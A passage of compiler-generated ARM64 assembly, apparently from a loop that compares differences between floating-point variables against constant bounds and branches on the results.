fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_127
LBB1_127: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_128
LBB1_128: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_129
LBB1_129: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_130
LBB1_130: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_131
LBB1_131: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_132
LBB1_132: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_133
LBB1_133: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_135
b LBB1_134
LBB1_134: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_135
LBB1_135: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_136
LBB1_136: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_137
LBB1_137: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_138
LBB1_138: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_139
LBB1_139: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_140
LBB1_140: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_141
LBB1_141: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_142
LBB1_142: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_143
LBB1_143: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_144
LBB1_144: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_145
LBB1_145: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_146
LBB1_146: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_147
LBB1_147: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_148
LBB1_148: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_149
LBB1_149: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_150
LBB1_150: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_151
LBB1_151: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_152
LBB1_152: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_153
LBB1_153: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_155
b LBB1_154
LBB1_154: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_155
LBB1_155: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_156
LBB1_156: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_157
LBB1_157: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_158
LBB1_158: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_159
LBB1_159: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_160
LBB1_160: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_161
LBB1_161: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_162
LBB1_162: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_163
LBB1_163: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_164
LBB1_164: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_165
LBB1_165: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_166
LBB1_166: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_167
LBB1_167: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_168
LBB1_168: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-15.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_169
LBB1_169: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_170
LBB1_170: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_171
LBB1_171: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_172
LBB1_172: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_173
LBB1_173: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_175
b LBB1_174
LBB1_174: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-148]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_175
LBB1_175: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_176
LBB1_176: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_177
LBB1_177: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_178
LBB1_178: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_179
LBB1_179: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_180
LBB1_180: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_181
LBB1_181: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_182
LBB1_182: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_183
LBB1_183: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_184
LBB1_184: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_185
LBB1_185: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_186
LBB1_186: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_187
LBB1_187: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-64]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_188
LBB1_188: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_189
LBB1_189: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_190
LBB1_190: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_191
LBB1_191: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_192
LBB1_192: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_193
LBB1_193: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_195
b LBB1_194
LBB1_194: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #140]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_195
LBB1_195: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_196
LBB1_196: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_197
LBB1_197: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_198
LBB1_198: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_199
LBB1_199: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_200
LBB1_200: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_201
LBB1_201: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_202
LBB1_202: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-16.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_203
LBB1_203: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_204
LBB1_204: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_205
LBB1_205: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_206
LBB1_206: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_207
LBB1_207: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
b LBB1_208
LBB1_208: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldr s0, [sp, #124]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_215
